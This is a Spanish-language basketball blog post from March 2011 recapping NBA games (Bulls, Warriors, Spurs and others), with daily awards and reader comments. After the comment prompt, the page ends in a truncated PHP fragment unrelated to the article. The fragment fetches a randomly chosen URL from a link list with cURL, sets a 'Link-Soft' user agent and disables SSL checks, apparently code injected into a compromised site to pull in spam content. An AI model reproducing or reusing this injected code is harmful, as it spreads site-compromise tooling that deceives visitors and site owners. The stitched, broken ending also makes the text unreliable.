La Crónica (11/03/2011)

12 de March de 2011 por TheDeerHunter

Excelente jornada para los Bulls. Primero por su sobrada victoria contra Atlanta a los que, aún sin Boozer, destrozaron a todos los niveles. Rose hizo y deshizo, pero Thibodeau destacó a Luol Deng, a quien definió como “el pegamento de su equipo”. Excelente actuación del británico-sudanés quien decidió ser de la partida a última hora por molestias físicas. Después tropiezo de los Celtics en Philadelphia. Gran rendimiento de los nuevos, Krstic y Green, pero malo de todos los demás y continúan los problemas defensivos en el centro. Hawes lo aprovechó siendo el mejor de los suyos y los Sixers dieron un clinic defensivo en el último cuarto extraordinario. Sensacional el trabajo de Doug Collins y su equipo cada vez más rodado de cara a playoffs. Por si fuera poco, también tropezaron los Magic en Oakland por una acumulación de factores. Fue un día de esos tontos que tienen los Warriors en los que te cosen a triples hagas lo que hagas (¡increíble 21 de 35!) La tríada Curry-Monta-Wright la armó como sólo ellos saben hacerlo. Aún así los de Van Gundy forzaron la prórroga también con un triplazo a sangre fría de Turkoglu pero en los momentos decisivos de la misma fallaron estrepitosamente. Tiros libres errados, una entrada franca a canasta resuelta con falta en ataque de Nelson y varias mandarinas de postre que se tiraron en el peor momento. La 4ª del este no peligra para ellos, pero la 2ª ronda contra el primero de la conferencia no se la va a quitar nadie.

Los Spurs ganaron a los Kings. La anécdota de la velada fue que un murciélago se coló en el recinto y todos miraron al gran “Vampire Killer” Manu Ginóbili. Se negó por los problemas que tuvo la otra vez con la asociación protectora de animales pero a cambio nos brindó otro de esos partidos mágicos que acostumbra hacer y que, a pesar del buen partido de los Kings, fue suficiente para amarrar la victoria. Los Thunder tampoco pasaron demasiados apuros contra los Pistons.

En las distintas zonas de lucha por postemporada los Bobcats dieron un paso de gigante ganando a Portland, ante el regreso de Gerald Wallace. Un último cuarto imparable de Stephen Jackson desequilibró un choque en el que los de McMillan tendieron a dejarse llevar. Cuando quisieron reaccionar Jackson estaba demasiado dulce.
Mientras los Pacers parecen empeñados en regalar su plaza y se llevaron un buen repaso en Toronto. Buen partido de Calde, pero Leandrinho parecía Michael Jordan. Los Jazz por su parte tampoco levantan cabeza y ayer Love volvió a hacerles la destroza de rigor.

Finalmente los Clippers cayeron en New Jersey también en la prórroga, con partidazo de la tríada Lopez… Humprhies y Farmar. Deron no era de la partida.

PREMIOS

MVP: El día que se empeña Monta Ellis es difícil discutirle un MVP. 39 puntos, 11 asistencias y 6 rebotes muy bien complementados por los 32 puntos y 6 rebotes de Dorell Wright. El porcentaje en triples de los Warriors fue sencillamente escandaloso.

El rookie: Correctos partidos de Griffin, de Monroe, de Cousins, de Paul George o de alguno de los rookies de los Jazz. Todos perdieron, sin embargo. Ed Davis por su parte, fue titular e importantísimo en la victoria de los Raptors ante Indiana. Con él disponible la baja de Amir Johnson es menos grave para el equipo.

La sorpresa: Jordan Farmar apoteósico, asumiendo responsabilidades en los momentos más críticos. 24 puntos, 7 asistencias siendo el líder de los Nets en su victoria ante los Clippers.

La decepción: No fue el día de Ray Allen. 5 puntitos y mal porcentaje de tiros. No se lo tendremos en cuenta.

El mayor esfuerzo en vano: Excelente partido de Turkoglu y Jason Richardson ofensivo que sirvió de poco ante la lluvia de meteoros llegados desde las manos de Curry, Monta y Wright.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Jona dice:
    #1

    Otro MVp para ellis , otro partido de 39 – 40 puntos pero para el all star no esta ,que va hombre

      Citar

  2. Sancho88 dice:
    #2

    y hasta Radmanovic clavó un par de triplazos desde la esquina. para que se anime ese cacho de carne tiene que ser un gran día para GSW, jeje. Fue sencillamente una orgía desde los siete metros. Quienes lo vimos lo pasamos de puta madre. a veces me da vergüenza el rechazo que hay en Europa al triple, y sin embargo, en USA es lo más normal y demuestran que el porcentaje de acierto en momentos clave es mucho mas efectivo que tirar de dos. Maravillosa defensa del señor David Lee sobre Dwight Howard (13 puntitos). No se le vio mucho en ataque pero el pavo en defensa lo secó. Thumbs up para él

      Citar

  3. Jona dice:
    #3

    Lo de ayer fue el record de triples en un partido NBA , con lo cual que Vlad se meta dos de los 36 que hubo no me parece raro, y por cierto este año ha hecho partidos notables dentro de que sigue siendo un perro y un pasota como lo ha sido toda su vida , http://www.nba.com/video/

      Citar

  4. Denise dice:
    #4

    Vaya orgia de puntos en Oakland. Ninguno de los dos mereció perder.

      Citar

  5. Denise dice:
    #5

    Los Heat van ganando de treintaypico a los Grizzlies. Traemos la pala y los desenterramos?

    PD: Bibby 5 triples…¿Estoy soñando?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>